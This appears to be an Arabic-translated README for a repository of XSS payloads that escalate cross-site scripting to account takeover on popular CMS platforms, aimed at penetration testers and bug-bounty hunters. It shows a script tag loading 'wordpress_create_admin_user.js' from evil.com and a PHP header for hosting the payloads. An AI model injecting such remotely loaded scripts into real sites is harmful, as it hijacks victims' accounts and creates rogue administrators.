
XSS payloads designed to turn alert(1) into P1
حمولات XSS مصممة لتحويل alert(1) إلى P1.
تم نشر هذا المستودع إلى جانب مقالة بعنوان "كيفية ترقية ثغرات XSS من Medium إلى Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
في هذا المستودع ستجد مجموعة من ملفات JavaScript يمكن تحميلها في حمولة XSS لتنفيذ وظائف حسّاسة على منصات CMS الشهيرة في سياق متصفح الضحية. يمكن أن يساعد ذلك في ربط ثغرة XSS بسيطة بشيء أكثر خطورة، مثل الاستيلاء على الحساب.
هذا مثالي لتعزيز خطورة تقرير اختبار الاختراق أو برنامج مكافآت الثغرات من خلال إظهار تأثير أمني حقيقي.
يتم إضافة الحمولات تدريجيًا كلما توفر لدي الوقت. هناك الكثير قادم، وإذا كنت تستطيع المساعدة، فنرحب بطلبات السحب (pull requests)! إذا كنت تبحث عن إلهام حول ما يجب إنشاؤه، فتحقق من تبويب "issues" في هذا المستودع.
أبسط طريقة لاستخدام هذه الحمولات هي استضافتها في مكان ما وتحميلها في خاصية src لوسم script الخاص بحمولة XSS كالتالي:
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
بدلاً من ذلك، اعتمادًا على سياق الحمولة وطولها، يمكن أحيانًا تصغيرها أو ترميزها ثم تضمينها مباشرة في الطلب.
لاستضافة ملف JavaScript، قد تحتاج إلى ضبط Content-Type على application/javascript. لتحقيق ذلك باستخدام PHP، يمكنك ببساطة إضافة هذا السطر في أعلى أي من الحمولات، وحفظه كملف .php واستضافته على خادم الويب الذي يدعم PHP:
<?php header("Content-Type: application/javascript"); ?>
هذه المقالة من Shift8 هي ما ألهمني لإنشاء هذا المستودع. يحتوي كود JS في المقالة على بعض الأخطاء المطبعية البسيطة، لكن المفاهيم دقيقة في محلها.